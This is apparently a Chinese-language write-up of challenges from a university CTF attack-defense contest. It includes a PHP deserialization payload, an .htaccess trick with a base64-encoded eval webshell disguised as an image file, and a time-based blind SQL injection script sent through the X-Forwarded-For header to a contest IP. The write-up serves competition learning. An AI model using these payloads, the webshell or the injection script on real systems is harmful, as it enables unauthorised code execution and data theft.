“古劍山”第一屆全國大學生網絡攻防大賽

群友說是原題杯 哈哈哈哈 我也不懂 我比賽打的少?

Web

Web | unse

源碼：

<?phpinclude("./test.php");if(isset($_GET['fun'])){if(justafun($_GET['fun'])){include($_GET['fun']);}}else{unserialize($_GET['yourcode']);}highlight_file(__FILE__);
?>

先偽協議讀取test.php 然后得到反序列化源碼：

<?php
$test = "Hello world";include "flag.php";function justafun($filename){$result = preg_match("/flag|zlib|string/i", $filename);if($result){return FALSE;}return TRUE;
}class afun {private $a;function __wakeup(){$temp = $this->a . 'ctf';}
}class bfun {private $items = array();public function __toString() {$item = $this->items;$str = $item['dd']->knife;return 'what the good?';}
}class cfun {private $params = array();public function __get($key) {global $flag;$tmp = $this->params[$key];var_dump($$tmp);}
}

a中的$this->a觸發bgood中的__toString方法，將$this->a賦值為new bfun()。
bdun中的$items[‘dd’]觸發cfun中的__get函數，給$items[‘dd’]賦值為new cfun()。
最后讓cdun中的$params[‘knife’]=”flag”?

<?php
$test = "Hello world";include "flag.php";function justafun($filename){$result = preg_match("/flag|zlib|string/i", $filename);if($result){return FALSE;}return TRUE;
}class afun {private $a;function __wakeup(){$temp = $this->a . 'ctf';}
}class bfun {private $items = array();public function __toString() {$item = $this->items;$str = $item['dd']->knife;return 'what the good?';}
}class cfun {private $params = array();public function __get($key) {global $flag;$tmp = $this->params[$key];var_dump($$tmp);}
}

這里注意私有變量需要內部構造函數來進行觸發其他魔術方法

這里這種框框換成%00 或者url編碼也行?

得到payload:

?yourcode=O:4:%22afun%22:1:{s:7:%22%00afun%00a%22;O:4:%22bfun%22:1:{s:11:%22%00bfun%00items%22;a:1:{s:2:%22dd%22;O:4:%22cfun%22:1:{s:12:%22%00cfun%00params%22;a:1:{s:5:%22knife%22;s:4:%22flag%22;}}}}}

得到flag

有點類似這道題

https://www.cnblogs.com/zzjdbk/p/13617530.html

Web | upload_2_shell?

參考：SUCTF的一些題解 - SecPulse.COM | 安全脈搏

BUU WEB [SUCTF 2019]EasyWeb_buu easy_web-CSDN博客?

?但這道題使用的是.htaccess解析

.htaccess:

#define width 1337
#define height 1337
php_value auto_prepend_file "php://filter/convert.base64-decode/resource=./wenda.jpg"
AddType application/x-httpd-php .jpg

?wenda.jpg:

GIF89a66
PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg==

然后上傳然后rce:

Web | 盲人摸象

沒做出來 感覺是XFF盲注 INSERT INTO 注入? 然后原題..

查看：https://delcoding.github.io/2018/03/bugku-writeup3/

Bugku-INSERT INTO 注入 - 簡書 (jianshu.com)

給個腳本：

import requests
import sys# 基于時間的盲注，過濾了逗號 ,
sql = "127.0.0.1'+(select case when substr((select flag from flag) from {0} for 1)='{1}' then sleep(5) else 0 end))-- +"
url = 'http://47.106.186.166:31590/'
flag = ''
for i in range(1, 40):print('正在猜測：', str(i))for ch in range(32, 129):if ch == 128:sys.exit(0)sqli = sql.format(i, chr(ch))# print(sqli)header = {'X-Forwarded-For': sqli}try:html = requests.get(url, headers=header, timeout=3)except:flag += chr(ch)print(flag)break

Web | easy_pickle

Web | 御姐還是蘿莉

好看 愛看 但不會

Misc

Misc | i have the flag

原題? ?ascii-3解碼

def shuchu():a = [115, 105, 109, 112, 108, 101, 101, 100, 117, 49, 50, 51]i = 0while (i < len(a)):print(chr(a[i]), end='')i = i + 1shuchu()

得到?simpleedu123?

輸入網站得到flag